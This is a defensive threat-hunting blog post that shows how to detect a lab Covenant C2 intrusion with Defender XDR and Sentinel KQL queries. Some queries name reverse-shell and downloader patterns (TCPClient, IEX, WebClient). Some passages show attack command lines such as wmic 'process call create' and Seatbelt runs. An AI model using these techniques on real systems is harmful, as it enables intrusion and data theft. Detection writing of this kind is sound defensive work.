Welcome back to our series! In Part 6, we walked through how the Red Team compromised our lab environment – John’s computer test001 – using a Covenant Grunt (malicious agent), established persistence with a scheduled task, escalated privileges (with tools like Seatbelt/SharpUp), moved laterally via Evil-WinRM and WMI, and finally staged/exfiltrated data. In Part 7, we switch hats to the Blue Team side. We’ll step through detecting each of those activities using Microsoft Defender XDR (Defender for Endpoint) and Microsoft Sentinel.

We aim to help new IT defenders learn how to spot these attacker footprints and respond effectively. We’ll use friendly, straightforward language and focus on actionable steps – including plenty of Kusto Query Language (KQL) queries you can run in Sentinel or Defender’s hunting console. Let’s dive in!

Initial Investigation: Leveraging Defender for Endpoint (XDR)

Before crafting queries, it’s wise to get an overview of what happened on the compromised host. Microsoft Defender for Endpoint provides a device timeline view that shows a chronological list of events on test001. By opening John’s machine in the Defender portal and selecting the Timeline tab, we can see suspicious activities at a glance. For example, you might notice entries like “powershell.exe ran PowerShell command: ‘<code>Get-WmiObject</code>’” or “schtasks.exe created” – clues correlating with the Red Team’s actions.

You can filter by dates and look for specific event types or MITRE technique tags on the timeline. In our case, around the time of compromise, the timeline for test001 would likely show events such as: a PowerShell session started (the Covenant stager), a new scheduled task registered, suspicious executables (Seatbelt/SharpUp) running, remote connection events (WinRM/WMI), and file archive creation. These visual cues help us form a hypothesis: John’s PC was running unusual PowerShell code, a scheduled task appeared, hacking tools ran, and connections to another host and outbound network activity occurred.

With this context in mind, we’ll now construct targeted Sentinel queries to hunt each of these activities across our environment. These KQL queries can be run in the Sentinel Logs blade (or in Defender’s Advanced Hunting) to validate and find evidence of malicious actions.

Detecting C2 Activity & Suspicious PowerShell Execution

One of the first things to check is suspicious PowerShell usage since our Red Team used a Covenant Grunt (likely injected via PowerShell). Malicious PowerShell often leaves telltale signs:

  • Encoded Commands: Attackers use the -EncodedCommand flag to run base64-encoded payloads. Legitimate admins rarely do this, so its presence is a red flag.
  • Network Calls: The Grunt might use PowerShell to call out to a C2 server (e.g. via Invoke-WebRequest or .NET WebClient).
  • In-Memory Assembly Load: Covenant’s PowerShell launcher might reflectively load a .NET assembly (which could appear in logs as System.Reflection.Assembly::Load, another suspicious pattern).

Let’s start with a query to hunt for PowerShell process launches with encoded commands in Windows security events (event ID 4688, “process creation”, with command-line logging enabled):


SecurityEvent

| where EventID == 4688

| where Process has "powershell.exe"

| where CommandLine has "-EncodedCommand"

This will return any processes where powershell.exe was started with an EncodedCommand argument – a strong indicator of obfuscated PowerShell often used by malware or C2 loaders. In our lab, this query should flag the Covenant launcher on test001 (run by John) since Covenant’s PowerShell one-liner likely used a long encoded string to initialize the Grunt.

We can broaden the search for other suspicious PowerShell commands. For example, Red Teams often download payloads via PowerShell. We might hunt for keywords like IEX (Invoke-Expression) or Web client usage. Another example is looking for specific malicious snippets; in Microsoft’s Hafnium investigation, they provided a query to catch a reverse shell invocation in PowerShell:


SecurityEvent

| where EventID == 4688

| where Process has_any ("powershell.exe", "PowerShell_ISE.exe")

| where CommandLine has "$client = New-Object System.Net.Sockets.TCPClient"

#This was used to detect Nishang reverse shells​

. We can adopt similar logic to find Covenant-related activity. Covenant’s PowerShell stager might not use the exact string above, but it could use .Net.WebClient or other network calls. So a more generic hunt could be:


SecurityEvent

| where EventID == 4688

| where Process has "powershell.exe"

| where CommandLine has_any ("Invoke-WebRequest", "New-Object Net.WebClient", "IEX", "System.Reflection.Assembly")

This query looks for any PowerShell execution that includes typical malicious patterns: using WebRequest/WebClient (file download/upload), IEX (often used to execute fetched code), or Assembly loading (common for fileless malware injection). If PowerShell Script Block Logging (Event ID 4104) is enabled, you could search those events for keywords like Compress-Archive or suspicious function calls.

What to look for: In test001’s results, you may find a PowerShell command loaded Covenant. For instance, an event showing PowerShell with a very long encoded command or contacting an unfamiliar external URL is likely our Grunt’s launch. Note the timestamp and user (it should be John’s account)—we’ll use this to correlate with subsequent actions.

Defender XDR tip: If cloud protection caught the alert in the Defender portal, it might have been generated for “Suspicious PowerShell command” or “PowerShell Downloader.” Even if not, the Device timeline would list the PowerShell command line (possibly flagged with a technique like Execution). You can click that event and see details such as the entire command and any associated network connections. This is a great starting point for pivoting into deeper hunting.

Hunting Persistence: Scheduled Task Creation

In Part 5, the attacker sets up a scheduled task on John’s machine for persistence. As defenders, we want to detect such activity. Windows logs an event whenever a new scheduled task is created: Event ID 4698 (“A scheduled task was created”) in the Security log​

. We can query Sentinel for this:


SecurityEvent

| where EventID == 4698

| where Computer == "test001"

This will return any task creation events on the compromised host. We’ll likely find an event around the time of John’s compromise, and it should contain details about the task name and the user who created it.

To make the analysis more manageable, we can parse the event data (XML) to extract key fields like Task Name and the creator user.​


SecurityEvent

| where EventID == 4698

| parse EventData with * 'Data Name="TaskName"' TaskName 'Data' *

| parse EventData with * 'Data Name="SubjectUserName"' User 'Data' *

| project TimeGenerated, Computer, User, TaskName

This query will list when the task was created, on which computer, by which user, and the task’s name. In our scenario, we might see something like: TimeGenerated: 2025-03-10 14:05:23, Computer: test001, User: John, TaskName: \Microsoft\Windows… (some name likely used by the attacker). If the Red Team tried to blend in, the task name might mimic a legit system task, but it will stand out as something new.

What to look for: Verify if John (or a process running as John) created a new task. If yes, that’s a significant find – it confirms persistence. Note the TaskName. You can further investigate that task on the endpoint (e.g. via the Task Scheduler library or schtasks /query) to see what program or script it runs. In our case, it might point to a file or command that re-launches the Covenant Grunt.

Defender XDR tip: Microsoft Defender for Endpoint can sometimes flag this behavior (e.g. “Scheduled task created by suspicious process”). On the device timeline, you would also see an event like “schtasks.exe created a scheduled task” around that time. This gives a quick visual cue in the portal. We can also use Advanced Hunting in Defender with a similar KQL (the schema DeviceProcessEvents can capture the schtasks.exe execution). For instance, a query like:


DeviceProcessEvents

| where FileName == "schtasks.exe" and ProcessCommandLine contains " /Create "

| where DeviceName == "test001"

#would catch the task creation command. Combining both approaches – Sentinel log search and Defender’s timeline – confirms that persistence was established.

Spotting Privilege Escalation Attempts (Seatbelt & SharpUp)

After persistence, our attacker ran Seatbelt and SharpUp – two reconnaissance and privilege escalation tools. These tools might not directly raise obvious alerts, but they do leave artifacts we can detect:

  • Process Executions: If these executables ran on disk, we can find their process executions by name (unless renamed).
  • Command-line Patterns: Seatbelt’s usage of certain flags can be searched for even if renamed.
  • Unusual Activities: These tools query system info, which might trigger Windows Event logs (for example, Seatbelt checking auto-logon registry or SharpUp looking at AlwaysInstallElevated settings).

1. Detect by process name: Easiest case – search for any process with names containing “Seatbelt” or “SharpUp”:


SecurityEvent

| where EventID == 4688

| where Process has_any ("Seatbelt.exe", "SharpUp.exe")

In our lab, if the Red Team ran the publicly named binaries, this query will surface those executions. For example, Seatbelt.exe launched from John’s user profile or temp directory. Even one hit is significant, as these are generally absent on user machines.

2. Detect by command-line usage: Adversaries sometimes rename these tools to evade simple name-based detection. However, Seatbelt in particular often uses distinctive command-line options. For instance, running all checks with Seatbelt uses group=all (or other group names), and output is often saved via outputfile=<file>. We can hunt for those substrings in process command lines:


SecurityEvent

| where EventID == 4688

| where CommandLine has_any ("-group=", "-outputfile=", "Seatbelt.exe")

This checks for any process launch (not just PowerShell, any process) that has “-group=” or “-outputfile” in its parameters (or is explicitly named Seatbelt). Such patterns are uncommon in standard software. Here is an example from an actual attack: an attacker ran Seatbelt.exe -group=all -outputfile C:\Temp\result.txt – very noisy and easy to spot. Our query would catch that.

For SharpUp, the approach is similar: search for the name if possible. SharpUp doesn’t have as many apparent flags since it primarily enumerates and possibly attempts known escalation techniques. If it was executed, we should see a process for it. Use the name query above (including “SharpUp.exe”). Additionally, check if any unusual privilege escalation alerts are triggered. Defender for Endpoint might flag specific behavior (e.g. a suspicious privilege token manipulation or a known UAC bypass attempt) depending on what SharpUp did.

What to look for: Identify any events where these tools ran. Confirm the user context (likely John) and the timestamp. If found, it indicates the attacker was actively scouting for ways to elevate privileges on test001. Also, see what the parent process was—was it launched via PowerShell or cmd.exe? For example, if our earlier query shows powershell.exe spawning Seatbelt.exe, that ties it back to the malicious PowerShell session (Covenant). Each piece reinforces the timeline of the attack.

Defender XDR tip: While generic EDR might not outright tag “This is Seatbelt”, the Defender sensor could detect it as a hack tool. Check if any Defender AV detections were logged on test001 (sometimes these tools get detected as HackTool or similar). Even if not, in the Advanced Hunting console, we could run:


DeviceProcessEvents

| where FileName in~("Seatbelt.exe","SharpUp.exe")

To search across all devices. This can reveal if the attacker tried the tools elsewhere, too.

Identifying Lateral Movement (Evil-WinRM & WMI)

Our attacker didn’t stop at John’s machine – they moved laterally to another system using Evil-WinRM (PowerShell Remoting) and possibly WMI. Detecting lateral movement is critical, as it means the compromise is spreading. We have several angles to catch this:

Detecting Evil-WinRM (Remote PowerShell Sessions)

Evil-WinRM is essentially a PowerShell Remoting client. When used on the target machine, it results in a WinRM service session that launches a PowerShell process under the hood. There are a few indicators:

  • There was a logon event (4624) for the user on the target with Logon Type = 3 (network) or 5 (service), and the Authentication Package might show Negotiate (for Kerberos/NTLM).
  • The process wsimprovhost.exe (the WinRM provider host) will spawn a child process (usually powershell.exe or cmd.exe if commands are run).
  • The PowerShell Operational log (if enabled) may log an event in which a remote session was created (with the connecting user).

A straightforward way with Defender data is to look for processes started by wsmprovhost.exe (i.e. processes where that is the parent):

DeviceProcessEvents

| where InitiatingProcessFileName =~ "wsmprovhost.exe"

| where FileName == "powershell.exe" or FileName == "cmd.exe"

| project Timestamp=TimeGenerated, DeviceName, InitiatingProcessFileName, FileName, InitiatingProcessAccountName

This advanced hunting query will list any PowerShell or cmd processes launched by wsmprovhost.exe (indicating a remote PowerShell session on that device). In a typical environment, you wouldn’t expect many instances of WinRM launching shells, so any result is worth investigating. In our case, if the attacker used Evil-WinRM to get into, say, server02 with John’s credentials, we would see on server02 that wsmprovhost.exe (WinRM) started a powershell.exe process running as John (or as the stolen admin account).

You can use Windows Event Logs via Sentinel if you don’t have Defender data. You might search for Logon events on other machines:


SecurityEvent

| where EventID == 4624

| where Account == "John"

| where Computer != "test001"

| where LogonType == 3 // network logon (e.g. WinRM)

This would show if John’s account logged into any other host (e.g. server02) over the network around the attack timeframe. If you find a successful login for John on a server he doesn’t normally access, followed by a series of commands, that’s a big clue for lateral movement.

What to look for: Identify the first event where John’s account appears on the target machine’s timeline (or logs). It might be a 4624 logon or a process starting as John at an odd time. Using the above DeviceProcessEvents query, you’ll likely see something like: Time X, Device = server02, InitiatingProcessFileName = wsmprovhost.exe, FileName = powershell.exe, AccountName = John. That means John initiated a remote PowerShell. That’s Evil-WinRM in action.

Detecting WMI Usage for Lateral Movement

Attackers might also use WMI to execute commands on remote machines (for example, using the wmic command or PowerShell’s Invoke-WmiMethod). WMI usage can be detected by looking at the WMI provider process, which can spawn other processes or catch the WMI command.

Option 1: Child processes of WMI provider – When a remote WMI call executes a process on a target, the process wmiprvse.exe (WMI provider) will spawn the requested program. We can hunt for WMI spawning standard tools (like cmd or powershell):


DeviceProcessEvents

| where InitiatingProcessFileName =~ "wmiprvse.exe"

| where FileName in~ ("cmd.exe", "powershell.exe", "wsmprovhost.exe", "rundll32.exe", "mshta.exe")

| project Timestamp=TimeGenerated, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, InitiatingProcessAccountName

This uses a heuristic: WmiPrvSE shouldn’t usually spawn those binaries, so if it does, it’s likely a remote execution via WMI. For example, user John’s result showing wmiprvse.exe -> cmd.exe /c whoami on server02 would indicate that John executed a command on server02 using WMI.

Option 2: WMI command usage – On the source machine (test001), if the attacker ran the wmic tool for remote execution, we can catch that in the command line. A classic WMI lateral movement is: wmic /node: “TargetHost” process call create “command to run”. We can search 4688 events on test001 for any use of process call create:


SecurityEvent

| where EventID == 4688

| where Process has "wmic.exe"

| where CommandLine contains "process call create"

This will flag any WMIC usage that spawns a remote process. A WMI lateral movement is precisely what an event on test001 with John’s account pointing to another host looks like.

What to look for: Combine the evidence from the source and target. If John’s machine shows wmic … process call create “powershell.exe” targeting server02, and server02 shows WmiPrvSE launching PowerShell as John at that time, you’ve confirmed the attacker used WMI to move laterally. Note the target machine name and commands run – the attacker might have created another Grunt on that machine or executed a payload there.

Defender XDR tip: Microsoft Defender for Endpoint would record these events, too. On the target device’s timeline, you might see “Process created via WMI” or even a specific alert if it was known to be malicious. Advanced hunting can unify this by looking at DeviceProcessEvents for parent-child relationships as we did or using DeviceNetworkEvents if WMI was executed over SMB (it might not show the network as it uses RPC). In any case, the Incident feature in Microsoft 365 Defender might automatically correlate John’s suspicious activities on multiple machines into a single incident, which is helpful for analysts to see the lateral movement path.

Detecting Data Staging & Exfiltration

Finally, the Red Team in Part 6 gathered data and exfiltrated it. They used PowerShell’s Compress-Archive to zip files, possibly transferring that archive out. Let’s break down the detection of data staging (archiving) and data exfiltration:

Detecting Archive Creation (Data Staging)

When attackers bundle up data (e.g. Compress-Archive or using tar/zip utilities), they might leave some clues:

  • PowerShell logs: If script block logging is on, Event ID 4104 would show Compress-Archive usage with paths of files being archived.
  • File creation events: If file monitoring is in place, a new .zip or .7z file appearing in an unusual directory (like a user’s temp folder) could be caught.
  • Process activity: A process like powershell.exe writing a large file.

Using Sentinel, if we have PowerShell logs, we can search for the Compress-Archive cmdlet:


SecurityEvent

| where EventID == 4104

| where ScriptBlockText contains "Compress-Archive"

This would list any PowerShell script blocks that include that cmdlet. In our case, John’s account on test001 likely ran something like Compress-Archive -Path C:\Data\Sensitive -DestinationPath C:\Users\John\Documents\data.zip. The script block text would reveal those paths.

If 4104 logs aren’t available, another approach is to look at file creation via Defender for Endpoint telemetry. For example:


DeviceFileEvents

| where FileName endswith ".zip" or FileName endswith ".7z"

| where InitiatingProcessFileName == "powershell.exe" and InitiatingProcessAccountName == "John"

| where DeviceName == "test001"

This query (in Defender hunting) checks if PowerShell created any ZIP/7Z files on John’s PC. If the Red Team archived data, it should show up here with the file path and timestamp.

What to look for: Identify any archive files created on test001 that coincide with the attack timeline. If you find one (say data.zip), that’s likely the staged data ready for exfiltration. Take note of its location and size if possible. This is evidence of data collection. In an investigation, you’d want to secure a copy of that archive to see what was taken.

Detecting Exfiltration (Data Transfer Out)

Detecting exfiltration can be tricky, but there are a few angles:

  • Network connections: Look at outbound connections from test001 (or whichever system had the data). If the Covenant Grunt exfiltrated data, it might be sent over the established C2 channel (which could be an HTTP/S request). Alternatively, the attacker might upload to an external server or cloud service.
  • Large data transfers: Check for vast volumes of data egress or uncommon destinations.
  • Known exfil tools: e.g., using Invoke-WebRequest or curl to post to an external site or cloud drive clients running unexpectedly.

If firewall or proxy logs are ingested using Sentinel, one could query those for test001’s traffic. But sticking to our tools at hand, we can leverage Defender’s network telemetry:


DeviceNetworkEvents

| where DeviceName == "test001"

| where RemoteIP != "YourInternalIPRange" // exclude internal traffic

| summarize TotalBytesSent = sum(SendByteCount) by RemoteIP, RemoteUrl, RemotePort

| sort by TotalBytesSent desc

This query sums all bytes sent by test001 to external IPs, sorting by volume. If our data exfiltration was significant, the destination IP or URL used for exfil should bubble to the top with a notably large TotalBytesSent. For example, if the attacker uploads the ZIP to a cloud service or sends it back to their C2, you might see an IP with a large byte count.

Even if the volume isn’t huge, look for any unusual external connections from test001 that weren’t present before. Covenant C2 traffic might stand out by connecting to an IP or domain not typically seen in your environment. For instance, if Covenant used HTTPS to a custom domain, you’d catch that domain in RemoteUrl. Also, if they used a tool like Invoke-WebRequest to upload data to a file-sharing site (e.g. an API call to Dropbox or an HTTP PUT to some server), that would appear.

What to look for: Identify the destination of the exfiltration. Suppose you see test001 sent a few megabytes of data to 2.2.2.2 on port 443 at the time corresponding to after the archive was created—that’s a strong sign of exfiltration. Without apparent volume, even a connection to an IP or domain that is known bad or not associated with your org is a clue (you might cross-reference it with threat intelligence feeds).

Defender XDR tip: The Defender for the Endpoint portal might have raised an alert like “Potential data exfiltration” if it recognized a large transfer or a known malicious domain. But if not, you can manually investigate network events via the device timeline. The timeline will list the processes’ connections (with addresses and ports). If you click on the timeframe after the archive creation, you might see events like powershell.exe connecting to <IP> or a browser connecting to johnwantsyourstuff.com  (just an example). Defender also sometimes tags connections with “Remote IP flagged as C2” if it’s known. All these help confirm whether data likely left the network and where it went.

Tying It All Together: Building the Incident Timeline

Now that we’ve gone through each tactic (C2 execution, persistence, escalation, lateral movement, exfiltration) individually, it’s essential to piece the puzzle together. As a defender, you want to reconstruct the attack timeline and understand the scope:

  • Initial Compromise: John’s account or machine was compromised at Time A (possibly via phishing or an exploit not covered in this post). We see Covenant Grunt activity starting then.
  • C2 Beacon/PowerShell: At Time B, a suspicious PowerShell session (Covenant) started on test001 (we detected via encoded command in logs).
  • Persistence: Minutes later, at Time C, John created a scheduled task on test001 (ensuring the attacker can regain access).
  • Privilege Escalation: Around Time D, Seatbelt/SharpUp ran, indicating the attacker was trying to become admin on test001. If they succeeded (say they found admin credentials in memory or a misconfiguration), you might see subsequent events as SYSTEM or another admin user.
  • Lateral Movement: At Time E, the attacker accessed another system (server02) via Evil-WinRM/WMI using John’s credentials or stolen creds. We saw John’s account log into server02 and execute processes there.
  • Data Access & Exfiltration: Finally, at Time F, on whichever system had the target data (it could still be test001 or the lateral target), they gathered files (Compress-Archive) and exfiltrated them to their server at Time G.

We create a narrative of the incident by writing down these times and events. This helps immensely in reporting and understanding the impact. Microsoft Sentinel can help correlate some of this if you create an Incident and attach relevant alerts or bookmarks for each stage. Microsoft 365 Defender might automatically group these into a single incident if the alerts are linked (for example, it might show an incident with alerts for “Malicious PowerShell”, “Suspicious Scheduled Task”, “Possible Credential Dump”, “Lateral Movement”, etc., all tied to the same overall breach).

Triage and Incident Response Tips for New Defenders:

  • Validate and Double-Check: When a query shows a suspicious event, drill down. For example, if a scheduled task event appears, open its details to see the task name and what action it was set to perform. This confirms if it’s malicious (e.g., runs a weird PowerShell script from Temp). Similarly, if you find a process like Seatbelt, check the file path – is it in an unusual location like C:\Users\John\Downloads\seatbelt.exe? Context matters.
  • Use the Timeline and Cross-References: We used both Sentinel queries and the Defender timeline. Use them together. If a Sentinel query finds something on server02, go to Defender, open server02’s timeline around that timestamp, and see what else happened. Maybe you’ll find the attacker created a new user or dumped credentials on that machine, too. Hunting is an iterative process.
  • Containment Actions: While hunting, be ready to respond. For instance, once you confirm Covenant is running on test001, you can take immediate action: isolate the machine via Defender for Endpoint (network isolation feature), or kill the malicious process if possible. Similarly, disable John’s account if it’s been compromised for lateral movement.
  • Capture Artifacts: Export relevant logs or save query results for evidence. Safely download that suspicious ZIP file (if still on disk) for analysis. These will be useful for post-incident analysis and lessons learned (and maybe forensics).
  • Mitigate and Remediate: After identifying all malicious tasks, processes, and accounts involved, remove or clean them. Delete the scheduled task, remove any backdoor accounts or tools left behind, and reset compromised credentials (John’s password or any other accounts the attacker used). Also, patch the vulnerabilities or misconfigurations that allowed the breach (for example, if SharpUp found AlwaysInstallElevated was enabled and the attacker used it, that setting should be fixed).
  • Learn and Improve: Each manual detection we make can potentially be turned into a continuous detection rule. For instance, create a Sentinel Analytics Rule for Event ID 4698 (task creation) so it alerts you next time, or a rule for wsmprovhost.exe spawning powershell.exe to catch remote PowerShell usage. This way, your SOC is better prepared for the future.

Throughout this investigation, we saw how important it is to have visibility (through logging and EDR) and to know where to look for evidence. By mastering a few KQL queries and understanding the Windows events behind attacker techniques, even a newcomer to threat detection can unravel a complex attack.

Conclusion

In Part 7, we successfully detected the Red Team’s actions from Part 6 using Microsoft Defender XDR and Sentinel. We identified the Covenant Grunt’s PowerShell activity, caught the scheduled task persistence, spotted using Seatbelt​ for recon, traced the lateral movement via Evil-WinRM and WMI, and flagged possible data exfiltration. More importantly, we tied these findings into a coherent story of the intrusion, which is crucial for effective incident response.

For new defenders: Take it step-by-step, use the tools at your disposal (the Defender portal’s insights and Sentinel’s powerful queries), and don’t be afraid to dig into logs—they will tell the tale of the attack. With practice, formulating hypotheses (“Did the attacker create a scheduled task? Let’s check 4698 events…”) and confirming them with data becomes second nature.

By implementing the detection queries and investigation tips above, your Blue Team should be well-equipped to detect similar attack patterns. This wraps up our series – from initial compromise to attacker tactics and the defender’s answer – highlighting that we can turn the tables on attackers and protect our environments with the right approach and tools. Stay safe, and happy hunting!

Sources: The KQL queries and techniques discussed were informed by Microsoft and community best practices for threat hunting. For example, searching for encoded PowerShell commands and specific malicious patterns is a known effective tactic, Windows event 4698 is a key indicator for new scheduled tasks, parent-child process relationships (WmiPrvSE or WsmProvHost spawning others) reveal lateral movement, and command-line artifacts from tools like Seatbelt can unmask attacker activity. These sources reinforce the detections we implemented above.  Remember, this is companion content to our new Red and Blue Teaming with Defender XDR book.

Thanks,

John Sr.